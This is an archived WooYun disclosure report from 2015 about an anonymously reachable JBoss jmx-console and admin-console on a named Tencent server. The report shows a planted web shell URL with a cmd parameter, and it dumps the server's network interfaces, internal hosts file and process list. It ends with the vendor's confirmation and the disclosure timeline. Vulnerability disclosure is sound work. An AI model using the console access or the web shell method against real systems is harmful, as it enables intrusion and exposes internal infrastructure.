乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-18: 细节已通知厂商并且等待厂商处理中 2015-05-18: 厂商已经确认,细节仅向厂商公开 2015-05-28: 细节向核心白帽子及相关领域专家公开 2015-06-07: 细节向普通白帽子公开 2015-06-17: 细节向实习白帽子公开 2015-07-02: 细节向公众公开
穿甲弹,腾讯某服务器后台匿名访问(可SHELL内网漫游)
http://health.gj.qq.com:8080/jmx-console/
OS Name: LinuxOS Version: 2.6.32.43-tlinux-1.0.10-stateArchitecture: amd64Distribution Name: CentOS LinuxDistribution Version: release 6.2 (Final)
http://health.gj.qq.com:8080/admin-console/secure/summary.seam?conversationId=4adminadmin
http://health.gj.qq.com:8080/a/pwn.jsp?cmd=ifconfig%20-a
eth0 Link encap:Ethernet HWaddr 00:E0:81:EA:3B:36 inet addr:183.232.90.74 Bcast:183.232.90.127 Mask:255.255.255.128 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:17987845 errors:0 dropped:0 overruns:0 frame:0 TX packets:366798 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1115490791 (1.0 GiB) TX bytes:101684624 (96.9 MiB)eth1 Link encap:Ethernet HWaddr 00:E0:81:EA:3B:37 inet addr:10.229.136.220 Bcast:10.229.136.255 Mask:255.255.255.192 UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1154181482 errors:0 dropped:0 overruns:0 frame:0 TX packets:497012765 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1568980382465 (1.4 TiB) TX bytes:497529017582 (463.3 GiB)ip6tnl0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 NOARP MTU:1460 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:2344759 errors:0 dropped:0 overruns:0 frame:0 TX packets:2344759 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1149731220 (1.0 GiB) TX bytes:1149731220 (1.0 GiB)sit0 Link encap:IPv6-in-IPv4 NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)tunl0 Link encap:IPIP Tunnel HWaddr NOARP MTU:1480 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6## You can set dns to resolve following domain name# for DNS, see http://km.oa.com/group/gslb/article_view/60750# tlinux team <[email protected]>#172.25.10.69 tlinux-mirrorlist.tencent-cloud.com tlinux-mirror.tencent-cloud.com172.25.10.70 tlinux-mirrorlist.tencent-cloud.com tlinux-mirror.tencent-cloud.com10.204.8.218 10-204-8-21810.187.130.211 10-187-130-21110.187.130.212 10-187-130-21210.187.130.213 10-187-130-21310.209.19.151 10-209-19-15110.224.128.103 10-224-128-10310.224.128.91 10-224-128-9110.224.129.82 10-224-129-82127.0.0.1 localhost10.204.8.218 10-204-8-21810.187.130.211 10-187-130-21110.187.130.212 10-187-130-21210.187.130.213 10-187-130-21310.209.19.151 10-209-19-15110.224.128.103 10-224-128-10310.224.128.91 10-224-128-9110.224.129.82 10-224-129-8210.229.136.220 10-229-136-220
UID PID PPID C STIME TTY TIME CMDroot 1 0 0 May04 ? 00:00:36 /sbin/initroot 2 0 0 May04 ? 00:00:00 [kthreadd]root 3 2 0 May04 ? 00:00:01 [migration/0]root 4 2 0 May04 ? 00:00:16 [ksoftirqd/0]root 5 2 0 May04 ? 00:00:00 [watchdog/0]root 6 2 0 May04 ? 00:00:01 [migration/1]root 7 2 0 May04 ? 00:00:12 [ksoftirqd/1]root 8 2 0 May04 ? 00:00:00 [watchdog/1]root 9 2 0 May04 ? 00:00:00 [migration/2]root 10 2 0 May04 ? 00:00:13 [ksoftirqd/2]root 11 2 0 May04 ? 00:00:00 [watchdog/2]root 12 2 0 May04 ? 00:00:00 [migration/3]root 13 2 0 May04 ? 00:00:16 [ksoftirqd/3]root 14 2 0 May04 ? 00:00:00 [watchdog/3]root 15 2 0 May04 ? 00:00:01 [migration/4]root 16 2 0 May04 ? 00:00:06 [ksoftirqd/4]root 17 2 0 May04 ? 00:00:00 [watchdog/4]root 18 2 0 May04 ? 00:00:04 [migration/5]root 19 2 0 May04 ? 00:00:05 [ksoftirqd/5]root 20 2 0 May04 ? 00:00:00 [watchdog/5]root 21 2 0 May04 ? 00:00:02 [migration/6]root 22 2 0 May04 ? 00:00:04 [ksoftirqd/6]root 23 2 0 May04 ? 00:00:00 [watchdog/6]root 24 2 0 May04 ? 00:00:02 [migration/7]root 25 2 0 May04 ? 00:00:04 [ksoftirqd/7]root 26 2 0 May04 ? 00:00:00 [watchdog/7]root 27 2 0 May04 ? 00:01:11 [events/0]root 28 2 0 May04 ? 00:00:18 [events/1]root 29 2 0 May04 ? 00:00:18 [events/2]root 30 2 0 May04 ? 00:00:16 [events/3]root 31 2 0 May04 ? 00:00:18 [events/4]root 32 2 0 May04 ? 00:00:17 [events/5]root 33 2 0 May04 ? 00:00:17 [events/6]root 34 2 0 May04 ? 00:02:14 [events/7]root 35 2 0 May04 ? 00:00:00 [khelper]root 40 2 0 May04 ? 00:00:00 [async/mgr]root 41 2 0 May04 ? 00:00:00 [pm]root 380 2 0 May04 ? 00:00:00 [sync_supers]root 382 2 0 May04 ? 00:00:00 [bdi-default]root 383 2 0 May04 ? 00:00:00 [kintegrityd/0]root 384 2 0 May04 ? 00:00:00 [kintegrityd/1]root 385 2 0 May04 ? 00:00:00 [kintegrityd/2]root 386 2 0 May04 ? 00:00:00 [kintegrityd/3]root 387 2 0 May04 ? 00:00:00 [kintegrityd/4]root 388 2 0 May04 ? 00:00:00 [kintegrityd/5]root 389 2 0 May04 ? 00:00:00 [kintegrityd/6]root 390 2 0 May04 ? 00:00:00 [kintegrityd/7]root 392 2 0 May04 ? 00:00:06 [kblockd/0]root 393 2 0 May04 ? 00:00:00 [kblockd/1]root 394 2 0 May04 ? 00:00:00 [kblockd/2]root 395 2 0 May04 ? 00:00:00 [kblockd/3]root 396 2 0 May04 ? 00:00:01 [kblockd/4]root 397 2 0 May04 ? 00:00:00 [kblockd/5]root 398 2 0 May04 ? 00:00:00 [kblockd/6]root 399 2 0 May04 ? 00:00:00 [kblockd/7]root 400 2 0 May04 ? 00:00:00 [kacpid]root 401 2 0 May04 ? 00:00:00 [kacpi_notify]root 402 2 0 May04 ? 00:00:00 [kacpi_hotplug]root 555 2 0 May04 ? 00:00:00 [ata/0]root 556 2 0 May04 ? 00:00:00 [ata/1]root 557 2 0 May04 ? 00:00:00 [ata/2]root 558 2 0 May04 ? 00:00:00 [ata/3]root 559 2 0 May04 ? 00:00:00 [ata/4]root 560 2 0 May04 ? 00:00:00 [ata/5]root 561 2 0 May04 ? 00:00:00 [ata/6]root 562 2 0 May04 ? 00:00:00 [ata/7]root 563 2 0 May04 ? 00:00:00 [ata_aux]root 570 2 0 May04 ? 00:00:00 [ksuspend_usbd]root 575 2 0 May04 ? 00:00:00 [khubd]root 578 2 0 May04 ? 00:00:00 [kseriod]root 621 2 0 May04 ? 00:00:00 [rpciod/0]root 622 2 0 May04 ? 00:00:00 [rpciod/1]root 623 2 0 May04 ? 00:00:00 [rpciod/2]root 624 2 0 May04 ? 00:00:00 [rpciod/3]root 625 2 0 May04 ? 00:00:00 [rpciod/4]root 626 2 0 May04 ? 00:00:00 [rpciod/5]root 627 2 0 May04 ? 00:00:00 [rpciod/6]root 628 2 0 May04 ? 00:00:00 [rpciod/7]root 718 2 0 May04 ? 00:00:00 [khungtaskd]root 719 2 0 May04 ? 00:00:32 [kswapd0]root 720 2 0 May04 ? 00:00:00 [aio/0]root 721 2 0 May04 ? 00:00:00 [aio/1]root 722 2 0 May04 ? 00:00:00 [aio/2]root 723 2 0 May04 ? 00:00:00 [aio/3]root 724 2 0 May04 ? 00:00:00 [aio/4]root 725 2 0 May04 ? 00:00:00 [aio/5]root 726 2 0 May04 ? 00:00:00 [aio/6]root 727 2 0 May04 ? 00:00:00 [aio/7]root 728 2 0 May04 ? 00:00:00 [nfsiod]root 732 2 0 May04 ? 00:00:00 [xfs_mru_cache]root 733 2 0 May04 ? 00:00:00 [xfslogd/0]root 734 2 0 May04 ? 00:00:00 [xfslogd/1]root 735 2 0 May04 ? 00:00:00 [xfslogd/2]root 736 2 0 May04 ? 00:00:00 [xfslogd/3]root 737 2 0 May04 ? 00:00:00 [xfslogd/4]root 738 2 0 May04 ? 00:00:00 [xfslogd/5]root 739 2 0 May04 ? 00:00:00 [xfslogd/6]root 740 2 0 May04 ? 00:00:00 [xfslogd/7]root 741 2 0 May04 ? 00:00:00 [xfsdatad/0]root 742 2 0 May04 ? 00:00:00 [xfsdatad/1]root 743 2 0 May04 ? 00:00:00 [xfsdatad/2]root 744 2 0 May04 ? 00:00:00 [xfsdatad/3]root 745 2 0 May04 ? 00:00:00 [xfsdatad/4]root 746 2 0 May04 ? 00:00:00 [xfsdatad/5]root 747 2 0 May04 ? 00:00:00 [xfsdatad/6]root 748 2 0 May04 ? 00:00:00 [xfsdatad/7]root 749 2 0 May04 ? 00:00:00 [xfsconvertd/0]root 750 2 0 May04 ? 00:00:00 [xfsconvertd/1]root 751 2 0 May04 ? 00:00:00 [xfsconvertd/2]root 752 2 0 May04 ? 00:00:00 [xfsconvertd/3]root 753 2 0 May04 ? 00:00:00 [xfsconvertd/4]root 754 2 0 May04 ? 00:00:00 [xfsconvertd/5]root 755 2 0 May04 ? 00:00:00 [xfsconvertd/6]root 756 2 0 May04 ? 00:00:00 [xfsconvertd/7]root 757 2 0 May04 ? 00:00:00 [crypto/0]root 758 2 0 May04 ? 00:00:00 [crypto/1]root 759 2 0 May04 ? 00:00:00 [crypto/2]root 760 2 0 May04 ? 00:00:00 [crypto/3]root 761 2 0 May04 ? 00:00:00 [crypto/4]root 762 2 0 May04 ? 00:00:00 [crypto/5]root 763 2 0 May04 ? 00:00:00 [crypto/6]root 764 2 0 May04 ? 00:00:00 [crypto/7]root 1083 2 0 May04 ? 00:00:00 [cciss_scan]root 1088 2 0 May04 ? 00:00:00 [scsi_eh_0]root 1091 2 0 May04 ? 00:00:00 [scsi_eh_1]root 1094 2 0 May04 ? 00:00:00 [scsi_eh_2]root 1097 2 0 May04 ? 00:00:00 [scsi_eh_3]root 1100 2 0 May04 ? 00:00:00 [scsi_eh_4]root 1103 2 0 May04 ? 00:00:00 [scsi_eh_5]root 1119 2 0 May04 ? 00:00:00 [scsi_tgtd/0]root 1120 2 0 May04 ? 00:00:00 [scsi_tgtd/1]root 1121 2 0 May04 ? 00:00:00 [scsi_tgtd/2]root 1122 2 0 May04 ? 00:00:00 [scsi_tgtd/3]root 1123 2 0 May04 ? 00:00:00 [scsi_tgtd/4]root 1124 2 0 May04 ? 00:00:00 [scsi_tgtd/5]root 1125 2 0 May04 ? 00:00:00 [scsi_tgtd/6]root 1126 2 0 May04 ? 00:00:00 [scsi_tgtd/7]root 1140 2 0 May04 ? 00:00:00 [iscsi_eh]root 1161 2 0 May04 ? 00:00:00 [megasas_ocr/0]root 1162 2 0 May04 ? 00:00:00 [megasas_ocr/1]root 1163 2 0 May04 ? 00:00:00 [megasas_ocr/2]root 1164 2 0 May04 ? 00:00:00 [megasas_ocr/3]root 1165 2 0 May04 ? 00:00:00 [megasas_ocr/4]root 1166 2 0 May04 ? 00:00:00 [megasas_ocr/5]root 1167 2 0 May04 ? 00:00:00 [megasas_ocr/6]root 1168 2 0 May04 ? 00:00:00 [megasas_ocr/7]root 1176 2 0 May04 ? 00:00:00 [galaxysas_ocr/0]root 1177 2 0 May04 ? 00:00:00 [galaxysas_ocr/1]root 1178 2 0 May04 ? 00:00:00 [galaxysas_ocr/2]root 1179 2 0 May04 ? 00:00:00 [galaxysas_ocr/3]root 1180 2 0 May04 ? 00:00:00 [galaxysas_ocr/4]root 1181 2 0 May04 ? 00:00:00 [galaxysas_ocr/5]root 1182 2 0 May04 ? 00:00:00 [galaxysas_ocr/6]root 1183 2 0 May04 ? 00:00:00 [galaxysas_ocr/7]root 1184 2 0 May04 ? 00:00:00 [galaxysas_devic]root 1256 2 0 May04 ? 00:00:00 [bnx2x]root 1283 2 0 May04 ? 00:00:00 [kstriped]root 1298 2 0 May04 ? 00:00:00 [kmpathd/0]root 1299 2 0 May04 ? 00:00:00 [kmpathd/1]root 1300 2 0 May04 ? 00:00:00 [kmpathd/2]root 1301 2 0 May04 ? 00:00:00 [kmpathd/3]root 1302 2 0 May04 ? 00:00:00 [kmpathd/4]root 1303 2 0 May04 ? 00:00:00 [kmpathd/5]root 1304 2 0 May04 ? 00:00:00 [kmpathd/6]root 1305 2 0 May04 ? 00:00:00 [kmpathd/7]root 1306 2 0 May04 ? 00:00:00 [kmpath_handlerd]root 1307 2 0 May04 ? 00:00:00 [ksnapd]root 1343 2 0 May04 ? 00:00:00 [usbhid_resumer]root 1344 2 0 May04 ? 00:00:00 [usbhid_reset]root 1372 2 0 May04 ? 00:00:05 [kjournald]root 1451 1 0 May04 ? 00:00:00 /sbin/udevd -droot 1895 2 0 May04 ? 00:00:17 [kjournald]root 1896 2 0 May04 ? 00:00:18 [kjournald]root 2205 2 0 May04 ? 00:03:26 [flush-8:0]root 2351 1 0 May04 ? 00:00:05 /sbin/rsyslogd -i /var/run/syslogd.pid -c 4dbus 2427 1 0 May04 ? 00:00:00 dbus-daemon --systemroot 2508 1 0 May04 ? 00:00:03 /usr/sbin/atdroot 2898 1 0 May04 ? 00:00:00 /usr/bin/rsync --address=10.229.136.220 --daemonroot 3654 1 0 May04 tty1 00:00:00 /sbin/mingetty /dev/tty1root 3656 1 0 May04 tty2 00:00:00 /sbin/mingetty /dev/tty2root 3658 1 0 May04 tty3 00:00:00 /sbin/mingetty /dev/tty3root 3660 1 0 May04 tty4 00:00:00 /sbin/mingetty /dev/tty4root 3662 1 0 May04 tty5 00:00:00 /sbin/mingetty /dev/tty5root 3664 1 0 May04 tty6 00:00:00 /sbin/mingetty /dev/tty6root 3666 1451 0 May04 ? 00:00:00 /sbin/udevd -droot 3667 1451 0 May04 ? 00:00:00 /sbin/udevd -droot 4109 1 0 May04 ? 00:00:34 /usr/local/sa/agent/plugins/sap1004root 16565 1 0 May16 ? 00:00:20 /usr/local/sa/agent/secu-tcs-agent /usr/local/sa/agent/secubase/secu-tcs-agent.cnfroot 16619 1 0 May16 ? 00:00:49 /usr/local/sa/agent/plugins/sap1002root 16622 1 0 May16 ? 00:00:53 /usr/local/sa/agent/plugins/sap1008root 16624 1 0 May16 ? 00:00:00 /usr/local/sa/agent/plugins/sap1014root 16628 1 0 May16 ? 00:00:03 /usr/local/sa/agent/plugins/sap1001root 16630 1 0 May16 ? 00:00:04 /usr/local/sa/agent/plugins/sap1007root 16631 16565 0 May16 ? 00:00:11 /usr/local/sa/agent/plugins/sap1005nslcd 17473 1 0 May07 ? 00:00:04 /usr/sbin/nslcdnscd 17531 1 0 May07 ? 00:00:54 /usr/sbin/nscdroot 17551 1 0 May07 ? 00:00:00 /usr/sbin/sshdroot 17555 1 0 May07 ? 00:00:00 /usr/sbin/sshd -o pidFile=/var/run/sshd_56000.pid -f /etc/ssh/sshd_config.lroot 17593 1 0 May07 ? 00:00:04 crondroot 17723 17593 0 11:54 ? 00:00:00 CRONDroot 17728 17723 0 11:54 ? 00:00:00 /bin/sh -c /usr/local/agenttools/agent/ServerMonitor.py >/dev/null 2>&1root 17729 17728 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17751 17729 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17752 17729 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17755 17729 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17760 17729 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17764 17729 0 11:54 ? 00:00:00 python /usr/local/agenttools/agent/ServerMonitor.pyroot 17888 1 0 May07 ? 00:03:14 /bin/sh ./safe_TsysAgent.sh startroot 17910 1 0 May07 ? 00:03:13 /bin/sh ./safe_TsysProxy.sh startroot 17929 17888 0 May07 ? 00:02:36 /usr/local/TsysAgent/bin/TsysAgentroot 17937 17910 0 May07 ? 00:03:35 /usr/local/TsysAgent/bin/TsysProxyroot 18047 17910 0 11:54 ? 00:00:00 sleep 5root 18048 17888 0 11:54 ? 00:00:00 sleep 5jboss 18072 21076 0 11:54 ? 00:00:00 ps -efroot 18081 1 0 May07 ? 00:00:12 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.confroot 18086 1 0 May07 ? 00:00:01 /usr/local/agenttools/agent/agentPlugInDroot 18090 1 0 May07 ? 00:01:41 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.confroot 18094 1 0 May07 ? 00:00:22 /usr/local/agenttools/agent/tcvmstatroot 18103 1 0 May07 ? 00:00:12 /usr/local/agenttools/agent/sysdddjboss 21000 1 0 May14 ? 00:00:00 /bin/sh /home/jboss/bin/run.sh -c default -b 0.0.0.0jboss 21076 21000 0 May14 ? 00:17:29 /home/jdk/bin/java -server -Xms128m -Xmx512m -XX:MaxPermSize=256m -Dorg.jboss.resolver.warning=true -Dsun.rmi.dgc.client.gcInterval=3600000 -Dsun.rmi.dgc.server.gcInterval=3600000 -Djava.net.preferIPv4Stack=true -Dprogram.name=run.sh -Dlogging.configuration=file:/home/jboss/bin/logging.properties -Djava.library.path=/home/jboss/bin/native/lib64 -Djava.endorsed.dirs=/home/jboss/lib/endorsed -classpath /home/jboss/bin/run.jar:/home/jdk/lib/tools.jar org.jboss.Main -c default -b 0.0.0.0root 22753 1 0 May04 ? 00:01:32 /usr/local/support/wsd_agent/wsd_agent /usr/local/support/wsd_agent/wsd_agent.conf
处理
危害等级:高
漏洞Rank:20
确认时间:2015-05-18 16:01
确认存在的漏洞 非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
暂无